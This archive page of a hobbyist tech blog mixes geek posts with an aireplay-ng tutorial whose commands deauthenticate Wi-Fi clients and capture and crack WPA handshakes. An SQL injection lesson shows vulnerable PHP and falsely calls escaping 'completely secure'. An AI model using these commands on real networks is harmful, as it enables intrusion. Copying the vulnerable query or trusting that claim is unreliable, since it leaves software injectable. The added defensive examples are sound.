16 Tattoos for a Nerd

January 13th, 2010

Geek Life Tattoo

Represent. This is the tattoo of MC Router. If you are reading this MC Router, we would appreciate a photo of the triforce tattoo.. please?

Virgin Boba Tattoo

This tattoo can be summed up in one word, epic.
Perhaps you don’t understand the amount of awesome in this tattoo… He has a Virgin Mary-Boba Fett tattoo with Han flipping Solo as the heart!

Watchmen Love Tattoo

If you don’t recognize the image above, read The Watchmen by Alan Moore. Close your browser, run to the bookstore, and read this graphic novel. The movie isn’t a substitute; read it.

Turn Me On Tattoo

Obscure, minimalist, and nerdy… what the best tattoos are made of.

Apple Fanboy Tattoo

The connection between a fanboy and his Mac is closer than Steve Jobs’s turtleneck is around his neck. Some fanboys will even brand themselves with the Apple logo to “think differently”.

D20 Tattoo

When I think of a D&D roll player, I usually think that they want to conceal that fact. But these geeks are out of the closet (or is that basement?). Let’s hope he keeps that muscle build… in a few years that die may lose some air!

Heartris Tattoo

An artist must have loved Tetris! There are a lot of Tetris tattoos, but there is a bit more creative spark behind this one.

Helvetica Tattoo

Want to arouse a typography nerd? Embed the definition of minimalism into your flesh with Helvetica. If you ever want a breakup, send them love notes in Papyrus.

Lego Ninja Tattoo

Legos are so f*cking cool!

Parents, do you want your children’s creativity to grow? Stop sending them to piano lessons, they will never use it anyway, and buy em a huge flippin set of Legos.

Mario Jedi Tattoo
What is more awesome than Mario? Jedi Mario of course…

Pacman Tattoo

Neat tattoo, not sure if I’d want it on my hand though. It would be pretty sweet to have it wrap around an ankle or something… since you can go around continuously on the map.

Guitar Hero Tattoo

This tattoo is atrociously awesome. The type of tattoo that makes you feel bad for not thinking of it first. Personally I never got

Pen Tool Tattoo

Illustrator users, behold in envy, the pen tool tattoo.

Super Hero Tattoo

Who cares if Wonder Woman starts sagging when I’m 40, I’m getting this on my chest.

Zelda Hearts Tattoo

I am resisting the urge to add the ‘Song of Time’ to every page on this blog as I write this…


Site Crashed

December 16th, 2009

Sorry for the downtime folks!

Apparently one of our plugins was causing some trouble. We bought the plugin “Global Translator Pro” in hopes that we could have translations of our site available to a larger community, but the code is a bit buggy.

Hope to have the translations working again soon as well!


Android Security: Fail

December 3rd, 2009

Over the last few years our lives have increasingly become integrated with technology. To many, an Android or iPhone is the cornerstone of their life. For lunch I fire up Google Latitude to see if a friend is nearby to grab a bite, I read my brother’s latest Twitter status as he trains in Florida for the Marines, at Walmart I scan laundry detergent barcodes through ShopSavvy to find a better deal. Only a few decades ago carrying a phone around with you wherever you went would be insane; why would you give everybody access to you at any time? To me, not having the internet with me at all times is equally ludicrous; how would I function?

This is a trade-off. There is, of course, a willing breach of privacy, but what about your security? What information could your phone tell me if I hacked it? Are you running banking apps, email accounts, VPN, Facebook, etc.? Breaching the security of a phone is just as serious as hacking a computer.

Early this year oCERT pointed out two large vulnerabilities with Android’s security. Both use a denial-of-service attack to potentially access your phone’s information.

According to oCERT:

Affected version:

Malformed SMS DoS:
Android all 1.5 CRBxx versions (where xx are digits)

Dalvik API DoS:
Android <= 1.5

Fixed version:

Malformed SMS DoS:
Android 1.5 CBDxx, CRCxx and COCxx (where xx are digits)

Dalvik API DoS:
Android >= Donut DRC79

http://www.ocert.org/advisories/ocert-2009-014.html

In an age in which we rely so heavily on technology we must be vigilant and correct these problems quickly, as technology is double-edged.

If you have a pre-1.6 Android phone, make sure you get your software upgraded as soon as possible.


Evolving Cyberpunk into Transhumanism

November 14th, 2009

Cyberpunk has slowly evolved and mutated into Transhumanism, shedding the skin of its grungy punk father for a new savvy coat. The transhumanist community has grown out of the lone basement-dwelling “console cowboy” to computer enthusiasts, entrepreneurs, and otaku fanboys.

This culture represents the future. Their aim may be slightly high, as The Age of Spiritual Machines will show, but they will eventually hit their targets. A machine as intelligent as you and I, or transferring your mind’s “self” through an electronic medium, sounds like science fiction now, but what technology hasn’t? If you explained the relativity of space and time to Aristotle he would think you were mad. This culture beats a path to the future so others can follow. Gaining cultural acceptance for ideas like genetically modified children or funding artificial general intelligence has very real benefits, and we have the transhumanists to thank.

We have enjoyed the presence of transhumanism since the birth of cyberpunk. The highly acclaimed cyberpunk author William Gibson wrote in Neuromancer about transhuman-esque individuals, the panther moderns. They seize upon the latest technologies and integrate electronic components. Serial Experiments Lain is more transhumanist than cyberpunk. She realizes that reality is not confined to the world of atoms as we see it, but extends to the electronic medium. The quintessential cyberpunk magazine, 2600, has even made mention.

Transhumanism isn’t so much a new idea as a refined and elegant version of cyberpunk.


Social Engineering through Sentence Structure

November 6th, 2009

Today I was perusing through some social engineering videos and found a very good one from DefCon 15 that I thought I would share.

The main idea of the talk is to rephrase sentences to lead others to the conclusion you want. These are the same techniques used in hypnosis; literally hacking how the mind works.

You do want to learn about this, don’t you?


(Sorry, there is just text on the video.)

If you liked the talk you can go to the blog of the presenter, Mike Murray.


Cracking Canon’s EOS Utility for Mac

November 4th, 2009

Today I had a small product photo-shoot and lo and behold, I forgot my CF card.

Canon has this nifty program called Digital Photo Professional through their EOS Utility. You can take a picture from, and save it to, your computer with it. Every Canon camera comes with a CD full of great software like this… but like any true techie I threw away the manufacturer’s disks.

For some reason Canon refuses to give away this software online. Even though the software only works with their cameras and every camera comes with a copy, they won’t let you download it! Some bigwig CEO must have freaked out when hearing “free” and “online” in the same sentence.

What’s worse is this software is not on any torrent sites or rapidshare.

Well, fortunately for me, there was a workaround.

For Mac:

  1. Download the latest “Updater” for your program here.
    1. Choose EOS > Digital EOS Camera > Your Model
    2. Navigate to “Drivers and Downloads”
    3. Choose OSX under the “Driver / Software Section”
  2. Mount the dmg image file.
  3. In the image you should see a file called “UpdateInstaller”. Drag that to your desktop.
  4. Control-click the “UpdateInstaller” on your desktop and choose “Show Package Contents” in the menu.
  5. In the new window go to Contents > Resources
  6. Delete updated.plist - update: it may be called update.plist now
  7. Run the software.
  8. Enjoy!

Canon, mind getting your act together? It’s not like some Nikon user is going to take advantage of the free software you paid good money to develop. You are a leader in digital photography, so step up to the digital age and distribute the software freely in both material and digital form.


Protect your script from SQL String Injections

October 23rd, 2009

What is an SQL Injection

An SQL injection is an exploit that manipulates the database of a website. It may grab a password you don’t want shared or simply rewrite it in the database.

This tutorial will explain how an SQL injection works and how to avoid this type of attack.

String Injections

Let’s imagine a piece of PHP that retrieves the age of a member on your forum. To do this, the PHP uses $_GET to read the value from the request and goes to another page.

The code may look like this:

// Vulnerable: the raw request value is interpolated into the SQL text
$age = $_GET['age'];
$requete = mysql_query("SELECT age FROM members WHERE age = '$age'");

This is potentially a nasty piece of code. Because the value is pasted straight into the query text, a quote character in it ends the string and the rest is read as SQL. Instead of asking for the age, one could potentially ask for the password of that user!

String Injections Protection

It’s not that difficult to protect yourself from this attack. All it takes is switching out a little code.

Instead of using the raw $_GET value, pass it through mysql_real_escape_string() first.
The code from above changes to:

// Escape the value before it is placed inside the quoted string
$age = mysql_real_escape_string($_GET['age']);
$requete = mysql_query("SELECT age FROM members WHERE age = '$age'");

Your PHP is now completely secure against this type of attack!
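
The difference between the two snippets above, and the limit of the escaping fix, as an added example that is not from the original post: it uses Python's sqlite3 with a constructed members table instead of PHP and MySQL so that it runs offline, and escape() is a stand-in for mysql_real_escape_string() using SQLite's quote-doubling rule. It goes one step beyond the post by also running the escaped value in an unquoted numeric comparison and through a bound parameter.

```python
import sqlite3

def make_db():
    # Constructed sample rows standing in for the forum's members table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (name TEXT, age INTEGER, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?)",
                   [("alice", 31, "pw-a"), ("bob", 45, "pw-b"), ("carol", 31, "pw-c")])
    return db

def escape(value):
    # Stand-in (assumption) for mysql_real_escape_string(): SQLite escapes ' as ''.
    return value.replace("'", "''")

def ages_concatenated(db, age):
    # Shape of the tutorial's first query: raw value pasted into the SQL text.
    return db.execute("SELECT age FROM members WHERE age = '%s'" % age).fetchall()

def ages_escaped_quoted(db, age):
    # Shape of the tutorial's fix: escaped value, still inside the quotes.
    return db.execute("SELECT age FROM members WHERE age = '%s'" % escape(age)).fetchall()

def ages_escaped_unquoted(db, age):
    # Same escaping, but the quotes were dropped because age "is a number".
    return db.execute("SELECT age FROM members WHERE age = %s" % escape(age)).fetchall()

def ages_bound(db, age):
    # Bound parameter: the value travels separately and is never parsed as SQL.
    return db.execute("SELECT age FROM members WHERE age = ?", (age,)).fetchall()

# Constructed request values: one relies on a quote, one needs no quote at all.
WITH_QUOTE = "x' OR '1'='1"
NO_QUOTE = "0 OR 1=1"

if __name__ == "__main__":
    db = make_db()
    print("concatenated, quote input :", len(ages_concatenated(db, WITH_QUOTE)), "rows")
    print("escaped+quoted, quote input:", len(ages_escaped_quoted(db, WITH_QUOTE)), "rows")
    print("escaped, no quotes in SQL  :", len(ages_escaped_unquoted(db, NO_QUOTE)), "rows")
    print("bound parameter, both      :",
          len(ages_bound(db, WITH_QUOTE)), len(ages_bound(db, NO_QUOTE)), "rows")
```

In PHP the bound-parameter form is a prepared statement through PDO or mysqli; the mysql_* functions used above were removed in PHP 7.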


Hydroponics on the Cheap

July 4th, 2009

I’ve never before played with hydroponics, but decided to make a hydro system without spending a dime.

I had all the items at home and you probably do too.
You will need:

  • Jar w/ lid (peanut butter jar is perfect!)
  • 2 straws
  • Styrofoam Cup (must be styrofoam for buoyancy)
  • Tape
  • Pin
  • Nail
  • Hammer
  • Exacto Knife
  • Plant
  • Miracle Grow

From the pictures you should be able to figure it out, but here’s the skinny.
(Hopefully Garbage Bio Magazine will let me write a more complete article on this soon!)

  • Take two straws and connect them together.  Take one of the “skrunchy” ends and bend the tip over itself and strap it down with tape.  Take your pin and gouge the end until satisfied.  (I recommend dipping the straw in your jar full of water and seeing how well the water flows in a mirror)
  • Grab your paper cup and exacto knife and start making little rectangular slits. Make sure to put some holes on the bottom, otherwise a majority of the oxygen from your air pump won’t get to the plant!
  • Now take your lid and put a fairly large hole in the middle.  You can use a hammer and nail or better yet a drill.  Remember that your hole will need to be big enough for your plant to grow into.  Make another hole for your straw to fit into.  To finish it all up poke a few holes around the lid so excess air has a place to go when you feed your little plant oxygen.
  • Put it all together!  (use pics below as a reference)
  • I used a spider plant bud as they are fairly easy to grow, but have fun and choose something you like.
  • Add a little plant food (miracle grow) and you’re done!

 


(pin-pricked straw is used as an ultra cheap air pump)

Note: So far I have one complaint with it. I don’t like the hole on the top for the plant. Over time the plant will need more space. I’ll have to find another solution…


Deauthentication Using Aireplay-ng

June 21st, 2009

This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:

  1. Recovering a hidden ESSID. This is an ESSID which is not being broadcast.
  2. Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
  3. Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Of course, this attack is totally useless if there are no associated wireless clients or on fake authentications.

Usage

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

ath0 is the interface name

Usage Examples

Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send multiple if you wish)

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing

ath0 is the interface name

Here is what the output looks like:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0

(switch to another console)

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

(wait for a few seconds)

aircrack-ng -w /path/to/dictionary out.cap

Here is the explanation of the above commands:

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0

Where:

-c 6 is the channel to listen on

--bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point

-w out is the file prefix of the file name to be written

ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

-0 means deauthentication attack

5 is number of groups of deauthentication packets to send out

-a 00:14:6C:7E:40:80 is MAC address of the access point

-c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated

ath0 is the interface name

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0

airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0

(switch to another console)

aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
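
A defender's view of the traffic described above, as an added example that is not part of the original post or of aircrack-ng: it parses raw 802.11 headers for deauthentication frames (management type, subtype 12) and flags an access point/station pair that sees a burst of them. The frames are constructed, are assumed to start at the 802.11 header with no radiotap prefix, and the one-second window and threshold of 10 are assumed values to tune per network.

```python
import struct
from collections import defaultdict, deque

def mac(raw):
    return ":".join("%02X" % b for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype != 12:            # management frame, subtype 12
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def deauth_bursts(capture, window=1.0, threshold=10):
    """Flag (bssid, station) pairs with >= threshold deauths inside `window` seconds."""
    recent, flagged = defaultdict(deque), set()
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dst, src, bssid, _reason = parsed
        station = dst if src == bssid else src  # the non-AP end of the pair
        times = recent[(bssid, station)]
        times.append(ts)
        while ts - times[0] > window:           # drop timestamps outside the window
            times.popleft()
        if len(times) >= threshold:
            flagged.add((bssid, station))
    return flagged

def build_deauth(dst, src, bssid, reason=7):
    # Constructed test frame: frame control, duration, 3 addresses, sequence, reason.
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (b"\xc0\x00\x00\x00" + raw(dst) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

# Constructed capture using the documentation MAC addresses from the text above.
AP, STA, OTHER = "00:14:6C:7E:40:80", "00:0F:B5:34:30:30", "00:0F:B5:AB:CB:9D"
BEACON = b"\x80\x00" + bytes(24)                # a beacon, not a deauth
SAMPLE = ([(0.0, BEACON), (5.0, build_deauth(AP, OTHER, AP))]   # one ordinary disconnect
          + [(10.0 + i * 0.01, build_deauth(STA, AP, AP)) for i in range(32)])

if __name__ == "__main__":
    print(deauth_bursts(SAMPLE))
```

Detection only reports that it is happening; 802.11w management frame protection, where both the access point and the clients support it, is what causes forged deauthentication frames to be discarded.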


Mac Rumors Hacked

June 1st, 2009

I was watching the live stream coming from Mac Rumors Live and then… things got a little “wired”

All of a sudden MacRumorsLive.com was saying that it was sponsored by 4chan and the KKK. The live stream flooded into a stream of typical 4chan banter. Most of it was centered around Steve Jobs dying. 4chan never pauses to be crude, insensitive, and counterproductive to human culture.

We are very saddened and mad that this has happened.

This is NOT hacking!

Hacking is about the pursuit of unlocking secrets, not destroying things. Even though hackers are the architects of a secure computing environment, what is left in most people’s heads are things like this. Reckless people doing reckless things.

Update: Thanks to mercurysquad from reddit for finding this…

http://macrumors.com/admin was world-readable with directory listing, php files were not parsed but sent verbatim, and the shadowed .passwd file was left intact. They deserved to get hacked.

While I don’t agree with the last statement, this clearly illustrates that this was just a bunch of computer “crackers” (different from real hackers) messing things up for the entire hacker lot.
